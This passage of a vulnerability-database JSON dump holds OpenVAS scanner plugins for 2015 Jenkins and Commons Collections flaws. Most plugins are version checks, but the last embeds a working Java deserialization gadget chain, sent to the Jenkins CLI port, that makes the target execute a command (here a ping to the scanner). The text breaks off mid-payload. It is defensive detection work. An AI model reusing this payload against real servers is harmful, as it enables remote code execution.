<krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807001\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\",\n \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\",\n \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-8103\", \"CVE-2015-7536\",\n \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_bugtraq_id(77572, 77570, 77574, 77636, 77619);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-12-15 17:52:00 +0530 (Tue, 15 Dec 2015)\");\n\n script_name(\"Jenkins Multiple Vulnerabilities - Nov15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with\n Jenkins and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error in 'Fingerprints' pages.\n\n - The usage of publicly accessible salt to generate CSRF protection tokens.\n\n - The XML external entity (XXE) vulnerability in the create-job CLI command.\n\n - An improper verification of the shared secret used in JNLP slave\n connections.\n\n - An error in sidepanel widgets in the CLI command overview and help\n pages.\n\n - The directory traversal vulnerability in while requesting jnlpJars.\n\n - An improper restriction on access to API tokens.\n\n - The cross-site scripting vulnerability in the slave overview page.\n\n - The unsafe deserialization in Jenkins remoting.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to obtain sensitive information, bypass the protection mechanism,\n gain elevated privileges, bypass intended access restrictions and execute\n arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"All Jenkins main line releases up to and including 1.637,\n all Jenkins LTS releases up to and including 1.625.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.638,\n Jenkins LTS users should update to 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(get_kb_item(\"jenkins/\" + port + \"/is_lts\")) {\n if(version_is_less(version:version, test_version:\"1.625.2\")) {\n vuln = TRUE;\n fix = \"1.625.2\";\n }\n} else {\n if(version_is_less(version:version, test_version:\"1.638\")) {\n vuln = TRUE;\n fix = \"1.638\";\n }\n}\n\nif(vuln) {\n report = report_fixed_ver(installed_version:version, fixed_version:fix, install_path:location);\n security_message(port:port, data:report, proto:proto);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-12-23T00:00:00", "id": "OPENVAS:1361412562310806920", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806920", "title": "Fedora Update for jenkins FEDORA-2015-89468612", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins FEDORA-2015-89468612\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806920\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-23 05:38:34 +0100 (Wed, 23 Dec 2015)\");\n script_cve_id(\"CVE-2015-5317\", \"CVE-2015-5319\", \"CVE-2015-5324\", \"CVE-2015-5321\",\n \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5326\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins FEDORA-2015-89468612\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-89468612\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-December/174273.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n if ((res = isrpmvuln(pkg:\"jenkins\", rpm:\"jenkins~1.609.3~4.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "scanner", "description": "Mageia Linux Local Security Checks mgasa-2016-0137", "modified": "2019-03-14T00:00:00", "published": "2016-05-09T00:00:00", "id": "OPENVAS:1361412562310131309", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131309", "title": "Mageia Linux Local Check: mgasa-2016-0137", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0137.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131309\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:18:11 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0137\");\n script_tag(name:\"insight\", value:\"Updated apache-commons-collections packages fix security vulnerability: Due to an issue with serialization, Java applications can be vulnerable to malicious remote code execution when the apache-commons-collections library is on the classpath (CVE-2015-8103).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0137.html\");\n script_cve_id(\"CVE-2015-8103\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0137\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.2~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:25:51", "bulletinFamily": "scanner", "description": "Jenkins is prone to remote code-execution vulnerability.", "modified": "2019-10-17T00:00:00", "published": "2016-07-22T00:00:00", "id": "OPENVAS:1361412562310105820", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105820", "title": "Jenkins CLI RMI Java Deserialization Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins CLI RMI Java Deserialization Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105820\");\n script_bugtraq_id(77636);\n script_cve_id(\"CVE-2015-8103\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-10-17T11:27:19+0000\");\n\n script_name(\"Jenkins CLI RMI Java Deserialization Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/77636\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2015/q4/241\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a serialized object which executes a ping against the scanner.\");\n\n script_tag(name:\"insight\", value:\"Unsafe deserialization allows unauthenticated remote attackers to run arbitrary code on the Jenkins master.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_tag(name:\"summary\", value:\"Jenkins is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Jenkins main line before 1.638, Jenkins LTS before 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-22 12:45:35 +0200 (Fri, 22 Jul 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/jenkins_cli\", 50000);\n script_mandatory_keys(\"jenkins/detected\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"dump.inc\");\n\nport = get_kb_item( \"Services/jenkins_cli\" );\nif( ! port )\n port = 50000;\n\nif( ! get_port_state( port ) )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\nheaders = raw_string( 0x00,0x14,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x3a,0x43,0x4c,0x49,0x2d,0x63,0x6f,0x6e,0x6e,0x65,0x63,0x74 );\nsend( socket:soc, data:headers );\nrecv = recv( socket:soc, length:512 );\n\nif( ! recv || \"JENKINS\" >!< recv ) {\n close( soc );\n exit( 0 );\n}\n\n# Used to confirm the vulnerability\nvtstrings = get_vt_strings();\nvtcheck = vtstrings[\"ping_string\"];\n\npayload = raw_string( 0x3c,0x3d,0x3d,0x3d,0x5b,0x4a,0x45,0x4e,0x4b,0x49,0x4e,0x53,0x20,0x52,0x45,0x4d,0x4f,0x54,0x49,0x4e,0x47,0x20,0x43,0x41,0x50,0x41,0x43,0x49,0x54,0x59,0x5d,0x3d,0x3d,0x3d,0x3e );\n\nex += raw_string(\n0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x73,0x75,0x6e,0x2e,0x72,0x65,0x66,0x6c,\n0x65,0x63,0x74,0x2e,0x61,0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x41,\n0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,\n0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x55,0xca,0xf5,0x0f,0x15,0xcb,\n0x7e,0xa5,0x02,0x00,0x02,0x4c,0x00,0x0c,0x6d,0x65,0x6d,0x62,0x65,0x72,0x56,0x61,\n0x6c,0x75,0x65,0x73,0x74,0x00,0x0f,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,\n0x6c,0x2f,0x4d,0x61,0x70,0x3b,0x4c,0x00,0x04,0x74,0x79,0x70,0x65,0x74,0x00,0x11,\n0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,\n0x3b,0x78,0x70,0x73,0x7d,0x00,0x00,0x00,0x01,0x00,0x0d,0x6a,0x61,0x76,0x61,0x2e,\n0x75,0x74,0x69,0x6c,0x2e,0x4d,0x61,0x70,0x78,0x72,0x00,0x17,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2e,0x50,0x72,\n0x6f,0x78,0x79,0xe1,0x27,0xda,0x20,0xcc,0x10,0x43,0xcb,0x02,0x00,0x01,0x4c,0x00,\n0x01,0x68,0x74,0x00,0x25,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,\n0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2f,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,\n0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x3b,0x78,0x70,0x73,0x71,0x00,0x7e,\n0x00,0x00,0x73,0x72,0x00,0x2a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x6d,0x61,0x70,0x2e,0x4c,0x61,0x7a,0x79,0x4d,0x61,0x70,\n0x6e,0xe5,0x94,0x82,0x9e,0x79,0x10,0x94,0x03,0x00,0x01,0x4c,0x00,0x07,0x66,0x61,\n0x63,0x74,0x6f,0x72,0x79,0x74,0x00,0x2c,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,\n0x63,0x68,0x65,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,\n0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,\n0x6d,0x65,0x72,0x3b,0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,\n0x61,0x63,0x68,0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,\n0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,\n0x73,0x2e,0x43,0x68,0x61,0x69,0x6e,0x65,0x64,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,\n0x72,0x6d,0x65,0x72,0x30,0xc7,0x97,0xec,0x28,0x7a,0x97,0x04,0x02,0x00,0x01,0x5b,\n0x00,0x0d,0x69,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x73,0x74,\n0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,0x63,0x68,0x65,0x2f,0x63,\n0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,\n0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,\n0x72,0x3b,0xbd,0x56,0x2a,0xf1,0xd8,0x34,0x18,0x99,0x02,0x00,0x00,0x78,0x70,0x00,\n0x00,0x00,0x05,0x73,0x72,0x00,0x3b,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x43,\n0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,\n0x65,0x72,0x58,0x76,0x90,0x11,0x41,0x02,0xb1,0x94,0x02,0x00,0x01,0x4c,0x00,0x09,\n0x69,0x43,0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,\n0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x78,0x70,\n0x76,0x72,0x00,0x11,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x52,0x75,\n0x6e,0x74,0x69,0x6d,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x49,0x6e,\n0x76,0x6f,0x6b,0x65,0x72,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,\n0x87,0xe8,0xff,0x6b,0x7b,0x7c,0xce,0x38,0x02,0x00,0x03,0x5b,0x00,0x05,0x69,0x41,\n0x72,0x67,0x73,0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,\n0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0b,0x69,0x4d,0x65,0x74,\n0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,\n0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x0b,0x69,\n0x50,0x61,0x72,0x61,0x6d,0x54,0x79,0x70,0x65,0x73,0x74,0x00,0x12,0x5b,0x4c,0x6a,\n0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x02,0x74,0x00,0x0a,0x67,0x65,0x74,0x52,\n0x75,0x6e,0x74,0x69,0x6d,0x65,0x75,0x72,0x00,0x12,0x5b,0x4c,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x43,0x6c,0x61,0x73,0x73,0x3b,0xab,0x16,0xd7,0xae,\n0xcb,0xcd,0x5a,0x99,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x00,0x74,0x00,0x09,\n0x67,0x65,0x74,0x4d,0x65,0x74,0x68,0x6f,0x64,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,\n0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0xa0,0xf0,0xa4,0x38,0x7a,0x3b,0xb3,0x42,0x02,\n0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1e,0x73,0x71,0x00,0x7e,0x00,0x16,\n0x75,0x71,0x00,0x7e,0x00,0x1b,0x00,0x00,0x00,0x02,0x70,0x75,0x71,0x00,0x7e,0x00,\n0x1b,0x00,0x00,0x00,0x00,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x75,0x71,\n0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1b,0x73,\n0x71,0x00,0x7e,0x00,0x16,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,\n0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,\n0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00);\n\nif( host_runs(\"Windows\") == \"yes\" )\n{\n cmd = 'ping -c 5 ' + this_host();\n win = TRUE;\n}\nelse\n cmd = 'ping -c 5 -p ' + hexstr(vtcheck) + ' ' + this_host();\n\nlen = raw_string( strlen( cmd ) );\n\nex += len + cmd + raw_string(\n0x74,0x00,0x04,0x65,0x78,0x65,0x63,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,\n0x01,0x71,0x00,0x7e,0x00,0x23,0x73,0x71,0x00,0x7e,0x00,0x11,0x73,0x72,0x00,0x11,\n0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,\n0x72,0x12,0xe2,0xa0,0xa4,0xf7,0x81,0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,\n0x61,0x6c,0x75,0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,\n0x67,0x2e,0x4e,0x75,0x6d,0x62,0x65,0x72,0x86,0xac,0x95,0x1d,0x0b,0x94,0xe0,0x8b,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,\n0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x48,0x61,0x73,0x68,0x4d,0x61,0x70,0x05,0x07,\n0xda,0xc1,0xc3,0x16,0x60,0xd1,0x03,0x00,0x02,0x46,0x00,0x0a,0x6c,0x6f,0x61,0x64,\n0x46,0x61,0x63,0x74,0x6f,0x72,0x49,0x00,0x09,0x74,0x68,0x72,0x65,0x73,0x68,0x6f,\n0x6c,0x64,0x78,0x70,0x3f,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x77,0x08,0x00,0x00,\n0x00,0x10,0x00,0x00,0x00,0x00,0x78,0x78,0x76,0x72,0x00,0x12,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x76,0x65,0x72,0x72,0x69,0x64,0x65,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x71,0x00,0x7e,0x00,0x3a);\n\nex = base64( str:ex );\n\npayload += ex;\npayload += raw_string( 0x00,0x00,0x00,0x00,0x11,0x2d,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x1b,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2e,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2e,0x55,0x73,0x65,0x72,0x52,\n 0x65,0x71,0x75,0x65,0x73,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x02,0x00,0x03,0x4c,0x00,0x10,0x63,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x50,0x72,0x6f,0x78,\n 0x79,0x74,0x00,0x30,0x4c,0x68,0x75,0x64,0x73,0x6f,0x6e,0x2f,0x72,0x65,0x6d,0x6f,0x74,0x69,0x6e,0x67,0x2f,0x52,0x65,0x6d,0x6f,0x74,0x65,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,\n 0x64,0x65,0x72,0x24,0x49,0x43,0x6c,0x61,0x73,0x73,0x4c,0x6f,0x61,0x64,0x65,0x72,0x3b,0x5b,0x00,0x07,0x72,0x65,0x71,0x75,0x65,0x73,0x74,0x74,0x00,0x02,0x5b,0x42,0x4c,0x00,0x08,\n 